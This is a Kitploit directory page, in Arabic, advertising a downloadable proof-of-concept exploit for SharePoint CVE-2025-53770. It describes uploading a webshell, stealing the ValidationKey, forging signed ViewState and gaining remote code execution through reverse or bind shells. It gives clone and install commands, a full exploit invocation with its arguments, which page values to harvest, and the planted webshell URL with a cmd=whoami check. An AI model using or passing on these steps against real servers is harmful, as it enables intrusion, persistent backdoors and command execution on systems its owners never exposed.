Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Toolshell_CVE-2025-53770 | Kitploit
أدوات/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubgreenforcenetworks/toolshell_cve-2025-53770

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Toolshell_CVE-2025-53770

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

ToolShell → إثبات مفهوم استغلال CVE‑2025‑53770

تتيح هذه الحزمة:

  1. رفع webshell إلى SharePoint
  2. استخراج ValidationKey
  3. توليد ViewState موقّع
  4. RCE عبر reverse/bind shell

🔧 الإعداد

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 التشغيل

قم برفع الـ webshell

من صفحة SharePoint يمكنك الوصول إلى مصدر الصفحة. فقط انتقل إلى تبويب عرض المصدر، ومن هناك إذا كان متاحًا ستحصل على ما يلي، وهو ما يمكنك نسخه:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (أي __VIEWSTATE حالي للسياق)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

يقوم هذا برفع spinstall0.aspx. تحقق: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

تنزيل الأداة